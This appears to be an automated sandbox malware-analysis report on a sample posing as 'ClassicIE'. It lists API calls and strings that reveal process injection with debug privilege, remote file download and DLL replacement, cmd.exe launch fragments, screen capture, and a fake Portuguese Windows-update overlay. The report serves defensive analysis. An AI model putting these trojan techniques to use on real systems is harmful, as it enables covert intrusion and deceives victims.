Instruction ID: 565302a4d46a0d02f57891ddb3a8376145fd3b42c96080dda952c28af5f5cb3d
Opcode Fuzzy Hash: e36900d66ae5e0e27912a54036210e421a18000bd6dfcd701cda5d6de1efbb41
Instruction Fuzzy Hash: 3213B272710B8885FB46DBA4D4453DD2362FB897E8F508612FA5D47AEADF78C688C340

Function 0000000180037F9C Relevance: 143.7, APIs: 41, Strings: 41, Instructions: 169libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 0000000180037FA9
GetProcAddress.KERNEL32 ref: 0000000180037FBC
GetProcAddress.KERNEL32 ref: 0000000180037FD3
GetProcAddress.KERNEL32 ref: 0000000180037FEA
GetProcAddress.KERNEL32 ref: 0000000180038001
GetProcAddress.KERNEL32 ref: 0000000180038018
GetProcAddress.KERNEL32 ref: 000000018003802F
GetProcAddress.KERNEL32 ref: 0000000180038046
GetProcAddress.KERNEL32 ref: 000000018003805D
GetProcAddress.KERNEL32 ref: 0000000180038074
GetProcAddress.KERNEL32 ref: 000000018003808B
GetProcAddress.KERNEL32 ref: 00000001800380A2
GetProcAddress.KERNEL32 ref: 00000001800380B9
GetProcAddress.KERNEL32 ref: 00000001800380D0
GetProcAddress.KERNEL32 ref: 00000001800380E7
GetProcAddress.KERNEL32 ref: 00000001800380FE
GetProcAddress.KERNEL32 ref: 0000000180038115
GetProcAddress.KERNEL32 ref: 000000018003812C
GetProcAddress.KERNEL32 ref: 0000000180038143
GetProcAddress.KERNEL32 ref: 000000018003815A
GetProcAddress.KERNEL32 ref: 0000000180038171
GetProcAddress.KERNEL32 ref: 0000000180038188
GetProcAddress.KERNEL32 ref: 000000018003819F
GetProcAddress.KERNEL32 ref: 00000001800381B6
GetProcAddress.KERNEL32 ref: 00000001800381CD
GetProcAddress.KERNEL32 ref: 00000001800381E4
GetProcAddress.KERNEL32 ref: 00000001800381FB
GetProcAddress.KERNEL32 ref: 0000000180038212
GetProcAddress.KERNEL32 ref: 0000000180038229
GetProcAddress.KERNEL32 ref: 0000000180038240
GetProcAddress.KERNEL32 ref: 0000000180038257
GetProcAddress.KERNEL32 ref: 000000018003826E
GetProcAddress.KERNEL32 ref: 0000000180038285
GetProcAddress.KERNEL32 ref: 000000018003829C
GetProcAddress.KERNEL32 ref: 00000001800382B3
GetProcAddress.KERNEL32 ref: 00000001800382CA
GetProcAddress.KERNEL32 ref: 00000001800382E1
GetProcAddress.KERNEL32 ref: 00000001800382F8
GetProcAddress.KERNEL32 ref: 000000018003830F
GetProcAddress.KERNEL32 ref: 0000000180038326
GetProcAddress.KERNEL32 ref: 000000018003833D

Strings

SetThreadpoolWait, xrefs: 00000001800380ED
SubmitThreadpoolWork, xrefs: 00000001800382D0
WaitForThreadpoolTimerCallbacks, xrefs: 00000001800380A8
AcquireSRWLockExclusive, xrefs: 000000018003825D
FlushProcessWriteBuffers, xrefs: 000000018003811B
CreateThreadpoolTimer, xrefs: 000000018003807A
WakeAllConditionVariable, xrefs: 0000000180038218
InitializeSRWLock, xrefs: 0000000180038246
CloseThreadpoolWork, xrefs: 00000001800382E7
TryAcquireSRWLockExclusive, xrefs: 0000000180038274
CreateSemaphoreW, xrefs: 000000018003804C
FlsFree, xrefs: 0000000180037FC2
CreateSymbolicLinkW, xrefs: 0000000180038167
WakeConditionVariable, xrefs: 0000000180038201
ReleaseSRWLockExclusive, xrefs: 000000018003828B
LCMapStringEx, xrefs: 000000018003832C
GetCurrentProcessorNumber, xrefs: 0000000180038149
CompareStringEx, xrefs: 00000001800382FE
kernel32.dll, xrefs: 0000000180037FA2
CloseThreadpoolTimer, xrefs: 00000001800380BF
CreateThreadpoolWait, xrefs: 00000001800380D6
FreeLibraryWhenCallbackReturns, xrefs: 0000000180038132
SetFileInformationByHandle, xrefs: 00000001800381BC
CreateEventExW, xrefs: 0000000180038035
InitializeConditionVariable, xrefs: 00000001800381EA
FlsAlloc, xrefs: 0000000180037FB2
InitializeCriticalSectionEx, xrefs: 0000000180038007
CloseThreadpoolWait, xrefs: 0000000180038104
GetFileInformationByHandleEx, xrefs: 00000001800381A5
GetTickCount64, xrefs: 000000018003818E
GetLocaleInfoEx, xrefs: 0000000180038315
GetCurrentPackageId, xrefs: 0000000180038177
FlsSetValue, xrefs: 0000000180037FF0
GetSystemTimePreciseAsFileTime, xrefs: 00000001800381D3
SetThreadpoolTimer, xrefs: 0000000180038091
FlsGetValue, xrefs: 0000000180037FD9
SleepConditionVariableCS, xrefs: 000000018003822F
SleepConditionVariableSRW, xrefs: 00000001800382A2
CreateThreadpoolWork, xrefs: 00000001800382B9
CreateSemaphoreExW, xrefs: 0000000180038063
InitOnceExecuteOnce, xrefs: 000000018003801E

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
API String ID: 667068680-295688737
Opcode ID: 205cbdab8f6b192d4ca1c5bee24c8efa7944b8974be263944af3df3b10bfbcdf
Instruction ID: e37386f3e1acec14474250d23516caadefef665a658c9aa2dd46081dd065a633
Opcode Fuzzy Hash: 205cbdab8f6b192d4ca1c5bee24c8efa7944b8974be263944af3df3b10bfbcdf
Instruction Fuzzy Hash: E3A19070605F5A91EA86EF54FC4839133A6B74EBD4FA59025A86E87335EF7C838D8700

Function 0000000180006FB0 Relevance: 106.3, APIs: 45, Strings: 15, Instructions: 1332filenetworksleepCOMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000709E
recv.WS2_32 ref: 0000000180007250
recv.WS2_32 ref: 0000000180007289
WSAGetLastError.WS2_32(?,00000000,00000000,?,00000000,?), ref: 0000000180007298
send.WS2_32 ref: 00000001800072CF
Sleep.KERNEL32(?,00000000,00000000,?,00000000,?), ref: 000000018000732C
DeleteFileW.KERNEL32 ref: 00000001800076D5
Sleep.KERNEL32 ref: 0000000180007771
MoveFileW.KERNEL32 ref: 000000018000787C
Sleep.KERNEL32 ref: 0000000180007969
DeleteFileW.KERNEL32 ref: 0000000180007E12
MoveFileW.KERNEL32 ref: 0000000180007AFC

Part of subcall function 000000018001F3A0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018001F521
Part of subcall function 000000018001F3A0: Concurrency::cancel_current_task.LIBCPMT ref: 000000018001F527

DeleteFileW.KERNEL32 ref: 00000001800081E9

Part of subcall function 0000000180038744: Concurrency::cancel_current_task.LIBCPMT ref: 0000000180038774
Part of subcall function 0000000180038744: Concurrency::cancel_current_task.LIBCPMT ref: 000000018003877A

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180008485
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000848B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800084E2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800084E8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800084EE
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800084F4
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800084FA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180008506
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180008512
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180008518
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180008524
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000852A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180008530
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180008536
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000853C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180008542
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180008548
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000854E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180008554
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000855A
Concurrency::cancel_current_task.LIBCPMT ref: 0000000180008560
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180008566
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000856C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180008572
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180008578
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000857E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180008584
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000858A
Concurrency::cancel_current_task.LIBCPMT ref: 0000000180008590
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180008596
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000859C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800085A2

Strings

.json, xrefs: 0000000180007BF9, 0000000180007FCD
ios_base::failbit set, xrefs: 00000001800084A2
ios_base::eofbit set, xrefs: 00000001800084A9
create_directories, xrefs: 0000000180006F39, 0000000180006F4E
Erro ao criar o arquivo extrado., xrefs: 0000000180006E89
Erro ao abrir o arquivo para escrita., xrefs: 000000018000712C
\ClassicIEDLL_64.dll, xrefs: 0000000180007524
ios_base::badbit set, xrefs: 0000000180008496
.old, xrefs: 0000000180007601
Erro ao abrir o arquivo no zip., xrefs: 0000000180006F24
\novo, xrefs: 000000018000747C
Erro ao abrir o arquivo zip., xrefs: 000000018000686D
\Archive.zip, xrefs: 000000018000734F
CONF: Arquivo recebido, xrefs: 00000001800072C5
Erro ao ler o arquivo do zip., xrefs: 0000000180006E6B

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskFile$DeleteSleep$Moverecv$ErrorLastsend
String ID: .json$.old$CONF: Arquivo recebido$Erro ao abrir o arquivo no zip.$Erro ao abrir o arquivo para escrita.$Erro ao abrir o arquivo zip.$Erro ao criar o arquivo extrado.$Erro ao ler o arquivo do zip.$\Archive.zip$\ClassicIEDLL_64.dll$\novo$create_directories$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 1374309253-2297301687
Opcode ID: 6fd7a6d92a762c421c4b9a0f1daf86e057cbd1f25390a59767d035a8ce0d1e74
Instruction ID: 9bccb7106605305500a877a9a52532a405e8485b881433a4cd5b8e2d060c97d0
Opcode Fuzzy Hash: 6fd7a6d92a762c421c4b9a0f1daf86e057cbd1f25390a59767d035a8ce0d1e74
Instruction Fuzzy Hash: F6D26A72710B8885EB52DF69D8443DD37A2FB497D8F508615EA6D07ADADF78C288C340

Function 00007FF6B40A1000 Relevance: 100.0, APIs: 42, Strings: 15, Instructions: 287libraryloaderthreadCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32 ref: 00007FF6B40A1074
GetProcAddress.KERNEL32 ref: 00007FF6B40A108A
FreeLibrary.KERNEL32 ref: 00007FF6B40A10A0
CoInitialize.OLE32 ref: 00007FF6B40A10E1
?DllLogToFile@@YAXPEB_W0ZZ.CLASSICIEDLL_64 ref: 00007FF6B40A10EF
CoUninitialize.OLE32 ref: 00007FF6B40A10F8
CoInitialize.OLE32 ref: 00007FF6B40A1141
?DllLogToFile@@YAXPEB_W0ZZ.CLASSICIEDLL_64 ref: 00007FF6B40A114F
?DllLogToFile@@YAXPEB_W0ZZ.CLASSICIEDLL_64 ref: 00007FF6B40A1157
?DllLogToFile@@YAXPEB_W0ZZ.CLASSICIEDLL_64 ref: 00007FF6B40A115D
GetWindowThreadProcessId.USER32 ref: 00007FF6B40A1188
OpenProcess.KERNEL32 ref: 00007FF6B40A119A
IsWow64Process.KERNEL32 ref: 00007FF6B40A11BC
CloseHandle.KERNEL32 ref: 00007FF6B40A11D8
GetModuleFileNameW.KERNEL32 ref: 00007FF6B40A1200
PathRemoveFileSpecW.SHLWAPI ref: 00007FF6B40A120E
PathAppendW.SHLWAPI ref: 00007FF6B40A1223
CreateProcessW.KERNEL32 ref: 00007FF6B40A12C4
CloseHandle.KERNEL32 ref: 00007FF6B40A12D3
CloseHandle.KERNEL32 ref: 00007FF6B40A12DE
?DllLogToFile@@YAXPEB_W0ZZ.CLASSICIEDLL_64 ref: 00007FF6B40A130B
FindWindowExW.USER32 ref: 00007FF6B40A1329
?DllLogToFile@@YAXPEB_W0ZZ.CLASSICIEDLL_64 ref: 00007FF6B40A1346
RegisterWindowMessageW.USER32 ref: 00007FF6B40A1353
SendMessageW.USER32 ref: 00007FF6B40A136D
GetCurrentProcess.KERNEL32 ref: 00007FF6B40A137C
OpenProcessToken.ADVAPI32 ref: 00007FF6B40A138F
LookupPrivilegeValueW.ADVAPI32 ref: 00007FF6B40A13BF
AdjustTokenPrivileges.ADVAPI32 ref: 00007FF6B40A13F1
CloseHandle.KERNEL32 ref: 00007FF6B40A13FC
GetModuleHandleW.KERNEL32 ref: 00007FF6B40A1409
OpenProcess.KERNEL32 ref: 00007FF6B40A141E
GetModuleFileNameW.KERNEL32 ref: 00007FF6B40A1441
VirtualAllocEx.KERNEL32 ref: 00007FF6B40A1460
WriteProcessMemory.KERNEL32 ref: 00007FF6B40A148B
GetModuleHandleW.KERNEL32 ref: 00007FF6B40A149C
GetProcAddress.KERNEL32 ref: 00007FF6B40A14AC
CreateRemoteThread.KERNEL32 ref: 00007FF6B40A14CB
WaitForSingleObject.KERNEL32 ref: 00007FF6B40A14DF
CloseHandle.KERNEL32 ref: 00007FF6B40A14E8
VirtualFreeEx.KERNEL32 ref: 00007FF6B40A1500
CloseHandle.KERNEL32 ref: 00007FF6B40A1509

Strings

shlwapi.dll, xrefs: 00007FF6B40A106A
SeDebugPrivilege, xrefs: 00007FF6B40A13A2
exe: topWindow=%X, caption=%X, xrefs: 00007FF6B40A132F
zone , xrefs: 00007FF6B40A1025
ClassicIE_32.exe, xrefs: 00007FF6B40A1214
%s %s, xrefs: 00007FF6B40A1231
ClassicIEDLL_64.dll, xrefs: 00007FF6B40A1402
Software\IvoSoft\ClassicIE\Settings|LogLevel|%LOCALAPPDATA%\ClassicShell\ClassicIELog.txt, xrefs: 00007FF6B40A1336
-xml , xrefs: 00007FF6B40A10AD
kernel32.dll, xrefs: 00007FF6B40A1495
ClassicIE.Injected, xrefs: 00007FF6B40A134C
h, xrefs: 00007FF6B40A125D
-backup , xrefs: 00007FF6B40A110D
LoadLibraryW, xrefs: 00007FF6B40A14A2
Client Caption, xrefs: 00007FF6B40A131A

Memory Dump Source

Source File: 00000006.00000002.4146867541.00007FF6B40A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6B40A0000, based on PE: true

Associated: 00000006.00000002.4146851129.00007FF6B40A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146885168.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146901761.00007FF6B40AF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146915321.00007FF6B40B3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff6b40a0000_8pIuMUYQX9q.jbxd

Similarity

API ID: HandleProcess$CloseFile@@$Module$FileOpenWindow$AddressCreateFreeInitializeLibraryMessageNamePathProcThreadTokenVirtual$AdjustAllocAppendCurrentFindLoadLookupMemoryObjectPrivilegePrivilegesRegisterRemoteRemoveSendSingleSpecUninitializeValueWaitWow64Write
String ID: %s %s$-backup $-xml $ClassicIE.Injected$ClassicIEDLL_64.dll$ClassicIE_32.exe$Client Caption$LoadLibraryW$SeDebugPrivilege$Software\IvoSoft\ClassicIE\Settings|LogLevel|%LOCALAPPDATA%\ClassicShell\ClassicIELog.txt$exe: topWindow=%X, caption=%X$h$kernel32.dll$shlwapi.dll$zone
API String ID: 3875682504-237187293
Opcode ID: c5ca4dcfcc9bfd26589c4858409325cbd6372c97778f9d026aa4ec95fc733e81
Instruction ID: 031b8d631dc56914eb41fa527a9af1d0013b56004d9e5671977ccb6d2f98ee5e
Opcode Fuzzy Hash: c5ca4dcfcc9bfd26589c4858409325cbd6372c97778f9d026aa4ec95fc733e81
Instruction Fuzzy Hash: 9BD11031A08B4686EB60DF69E8946BA67B1FF88B85F444035DB5E87B54EF3CE509C700

Function 0000000180011EC0 Relevance: 81.7, APIs: 34, Strings: 12, Instructions: 1222filesleepCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32 ref: 00000001800121B1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800124F2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800124F8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180012504
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018001250A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180012510
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180012516
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180012522
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180012528
DeleteFileW.KERNEL32 ref: 0000000180012671
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800129B2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800129B8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800129C4
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800129CA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800129D0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800129D6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800129E2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800129E8
DeleteFileW.KERNEL32 ref: 0000000180012B65
Sleep.KERNEL32 ref: 0000000180012C9C
ShellExecuteA.SHELL32 ref: 0000000180013142
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800131A8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800131B4
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800131BA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800131C0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800131C6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800131D2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800131D8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800131DE
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800131E4
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800131F0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800131F6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800131FC

Part of subcall function 0000000180011EC0: Sleep.KERNEL32 ref: 0000000180012F1F

Strings

ios_base::failbit set, xrefs: 000000018001202B
2.ini, xrefs: 000000018001261D, 0000000180012830
Erro ao abrir o arquivo de imagem para leitura., xrefs: 0000000180013262
/C cd ", xrefs: 0000000180012F5C
ios_base::eofbit set, xrefs: 0000000180012032
cmd.exe, xrefs: 0000000180013132
1.ini, xrefs: 000000018001215D, 0000000180012370
.exe & exit, xrefs: 0000000180013008
open, xrefs: 0000000180013139
_2.ini, xrefs: 0000000180012B0F, 0000000180012DA6
" & start , xrefs: 0000000180012F74
ios_base::badbit set, xrefs: 000000018001201F

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$DeleteFile$Sleep$ExecuteShell
String ID: " & start $.exe & exit$/C cd "$1.ini$2.ini$Erro ao abrir o arquivo de imagem para leitura.$_2.ini$cmd.exe$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$open
API String ID: 3755060958-4044111370
Opcode ID: f015d343f163b3b0a8ce05e7aa38a62b1a02cefbf5a74a1cb200082aa3708937
Instruction ID: 4d9a4cf30266c5ecf4080e86c495fae651aa4ed06943b10a8faf469009eb9d18
Opcode Fuzzy Hash: f015d343f163b3b0a8ce05e7aa38a62b1a02cefbf5a74a1cb200082aa3708937
Instruction Fuzzy Hash: 2DC26D32714B8886FB42CB64E8443DD3362F7897D8F508615EA9C17AEADF78C299D344

Function 00000001800233F0 Relevance: 63.3, APIs: 29, Strings: 7, Instructions: 291windowCOMMON

Download Yara Rule

APIs

DefWindowProcW.USER32 ref: 0000000180023431
DestroyWindow.USER32 ref: 000000018002343C
BeginPaint.USER32 ref: 000000018002344F
CreateCompatibleDC.GDI32 ref: 000000018002345B
SelectObject.GDI32 ref: 000000018002346E
GetObjectW.GDI32 ref: 0000000180023485
BitBlt.GDI32 ref: 00000001800234BA
SelectObject.GDI32 ref: 00000001800234D3
GetObjectW.GDI32 ref: 00000001800234EC
BitBlt.GDI32 ref: 0000000180023526
SelectObject.GDI32 ref: 0000000180023532
DeleteDC.GDI32 ref: 000000018002353B
EndPaint.USER32 ref: 000000018002354C
PostQuitMessage.USER32 ref: 0000000180023559
GetModuleHandleW.KERNEL32 ref: 00000001800235D8
CreateWindowExW.USER32 ref: 0000000180023631
SendMessageW.USER32 ref: 000000018002364F
GetModuleHandleW.KERNEL32 ref: 0000000180023698
CreateWindowExW.USER32 ref: 00000001800236F1
SendMessageW.USER32 ref: 000000018002370F
GetModuleHandleW.KERNEL32 ref: 0000000180023758

Strings

MAINMODAL5, xrefs: 00000001800238C7
MAINMODAL1, xrefs: 00000001800235C2
MAINMODAL4, xrefs: 0000000180023802
MAINMODAL3, xrefs: 0000000180023742
msctls_progress32, xrefs: 0000000180023624, 00000001800236E4, 00000001800237A4, 0000000180023864, 00000001800238ED
MAINMODAL2, xrefs: 0000000180023682
, xrefs: 0000000180023508

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: Object$Window$CreateHandleMessageModuleSelect$PaintSend$BeginCompatibleDeleteDestroyPostProcQuit
String ID: $MAINMODAL1$MAINMODAL2$MAINMODAL3$MAINMODAL4$MAINMODAL5$msctls_progress32
API String ID: 2394519391-1842652365
Opcode ID: fa3cf7a9f8f0adb668c2b326dfc5de9852c489869a99ecf7a702c27fe82b1a34
Instruction ID: 70da03199f6224966238f9217e041adcfc8360141cfc13f752b4ff7df68ec302
Opcode Fuzzy Hash: fa3cf7a9f8f0adb668c2b326dfc5de9852c489869a99ecf7a702c27fe82b1a34
Instruction Fuzzy Hash: E0E16872214B8886E7A68B15FC5079A77A2F78DBC0F548019FA8A07B64DF7DC748CB00

Function 0000000180023FC0 Relevance: 52.7, APIs: 27, Strings: 3, Instructions: 237timewindowCOMMON

Download Yara Rule

APIs

DefWindowProcW.USER32 ref: 0000000180024006
InvalidateRect.USER32 ref: 000000018002404F
BeginPaint.USER32 ref: 00000001800240A1
GetClientRect.USER32 ref: 00000001800240B1
CreateSolidBrush.GDI32 ref: 00000001800240BC
FillRect.USER32 ref: 00000001800240CF
DeleteObject.GDI32 ref: 00000001800240D8
GdipImageSelectActiveFrame.GDIPLUS ref: 0000000180024109
GdipCreateFromHDC.GDIPLUS ref: 0000000180024123
GdipDrawImageRectI.GDIPLUS ref: 000000018002415F
GdipDeleteGraphics.GDIPLUS ref: 000000018002416A
SetBkMode.GDI32 ref: 0000000180024178
SetTextColor.GDI32 ref: 0000000180024186
CreateFontW.GDI32 ref: 00000001800241D3
SelectObject.GDI32 ref: 00000001800241E2
DrawTextW.USER32 ref: 0000000180024226
DeleteObject.GDI32 ref: 000000018002422F
EndPaint.USER32 ref: 000000018002423C
GdiplusShutdown.GDIPLUS ref: 000000018002426C
KillTimer.USER32 ref: 000000018002427A
PostQuitMessage.USER32 ref: 0000000180024282
SetTimer.USER32 ref: 00000001800242C1
SetTimer.USER32 ref: 00000001800242D6
GetClientRect.USER32 ref: 00000001800242EA
GdipGetImageWidth.GDIPLUS ref: 0000000180024304
GdipGetImageHeight.GDIPLUS ref: 0000000180024329

Strings

Preparando o WindowsNo desligue o computador, xrefs: 0000000180024294
Segoe UI, xrefs: 000000018002418C
0SK, xrefs: 00000001800241EE, 000000018002429B

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: Gdip$Rect$Image$CreateDeleteObjectTimer$ClientDrawPaintSelectText$ActiveBeginBrushColorFillFontFrameFromGdiplusGraphicsHeightInvalidateKillMessageModePostProcQuitShutdownSolidWidthWindow
String ID: 0SK$Preparando o WindowsNo desligue o computador$Segoe UI
API String ID: 2850571801-2194723922
Opcode ID: b4a3454dd8b0f3aa42ba21d82658db9e0a1c856beaccf8abc3f259bb9c72e4e2
Instruction ID: 646cc84641779264e143f7b20ab227dbb759dfddb9d14f6ebbfb5ab3da819cc8
Opcode Fuzzy Hash: b4a3454dd8b0f3aa42ba21d82658db9e0a1c856beaccf8abc3f259bb9c72e4e2
Instruction Fuzzy Hash: D5B15B72604A498AFB968F29EC443D937A1FB4DBC4F508115FA5A8BA64DF78C74DCB00

Function 0000000180006010 Relevance: 44.0, APIs: 21, Strings: 4, Instructions: 224windowCOMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 0000000180006044
GetDeviceCaps.GDI32 ref: 0000000180006055
GetDeviceCaps.GDI32 ref: 0000000180006065
CreateCompatibleDC.GDI32 ref: 0000000180006070
CreateDIBSection.GDI32 ref: 00000001800060BD
DeleteDC.GDI32 ref: 00000001800060E2
ReleaseDC.USER32 ref: 00000001800060ED
SelectObject.GDI32 ref: 0000000180006100
BitBlt.GDI32 ref: 000000018000612A
GdipCreateBitmapFromHBITMAP.GDIPLUS ref: 0000000180006159
CreateStreamOnHGlobal.OLE32 ref: 000000018000617C
GdipGetImageEncodersSize.GDIPLUS ref: 0000000180006194
GdipGetImageEncoders.GDIPLUS ref: 00000001800061B7
GdipSaveImageToStream.GDIPLUS ref: 0000000180006222
DeleteObject.GDI32 ref: 0000000180006246
